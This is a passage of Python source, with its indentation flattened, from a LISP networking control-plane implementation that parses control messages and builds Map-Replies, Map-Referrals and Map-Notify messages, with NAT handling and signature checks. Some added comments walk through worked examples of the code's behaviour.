        # So go to the payload and put back 0x40 where split() separated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
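#
# A worked example of the bit-stuffing interaction above (an editor's
# sketch): lisp_command_ipc("a@b", "lisp-etr") arrives here as
# "command@3@lisp-etr@@a@b". split("@") yields
# ["command", "3", "lisp-etr", "", "a", "b"], an array longer than 5, so
# lisp_bit_stuff(["a", "b"]) restores the payload "a@b", and the null port
# field becomes "no-port".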
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
keys, enc, auth, mr_ttl=-1):
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
for rloc_entry in rloc_set:
rloc_record = lisp_rloc_record()
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs):
rloc_record.local_bit = True
rloc_record.probe_bit = rloc_probe
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
    # we are an ETR not behind a NAT, we want to return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do RTR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, True, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have the shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
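#
# Example scenario (an editor's sketch with made-up addresses): the target
# site registered [10.0.0.2 (private), 128.9.1.1] and the source site
# registered [10.0.0.3 (private), 128.9.1.1]. The global RLOCs match, so
# [10.0.0.2] is returned and the xTRs encap directly to each other rather
# than hair-pinning through the NAT device.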
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
    # address in the rtr-list for the sole purpose of identifying the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
    # Create two small lists: a list of RTRs, which are unicast priority 254,
    # and an rloc-set of records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
    #endfor
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
    # Check the case where an ETR included a local RLOC and may be behind
    # the same NAT as the requester. In this case, the requester can encap
    # directly to the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
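#
# Example (an editor's sketch): for a registered RLOC-set [R (priority 254),
# P (private), G (global, priority 1)], a requesting RTR gets back [P, G],
# while a requesting ITR gets back [P, R]; the ITR probes the private RLOC
# and can fall back to encapsulating to the RTR.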
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify message to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription is being requested; return a Map-Notify so the ITR knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
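#
# Pictorially (an editor's sketch; in the LISP spec Map-Reply is type 2 and
# Map-Notify is type 4):
#
#   Map-Reply:  [type/flags/record-count (4)] [nonce (8)] [records ...]
#   Map-Notify: [type/record-count (4)] [nonce (8)]
#               [key-id/alg-id/auth-len = 0 (4)] [records ...]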
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
    # a problem on the RTR, when behind a NAT. For an ITR, it usually
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
    # If we are requesting non-Crypto-EIDs and signatures are configured
    # to be required and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
        # We do not want to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
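        #
        # For example (an editor's sketch): force-ttl 300 encodes as
        # 0x8000012c, which a receiver decodes as 300 seconds rather than
        # 300 minutes.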
#
        # Does policy say what the ttl should be? And whether we should drop
        # the Map-Request and return a negative Map-Reply.
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
    # Don't tell a spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
    # If this Map-Request is also a subscription request, return the same
    # information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, False, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from a Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left to that bit position. That is the
# new mask-length. Compare it to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
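#
# Worked example (an editor's sketch): eid 10.1.0.0 and entry_prefix
# 10.2.0.0 XOR to 0.3.0.0, whose first set bit from the left is bit 14, so
# the candidate mask-length is 14. The longest candidate across all walked
# entries wins.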
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
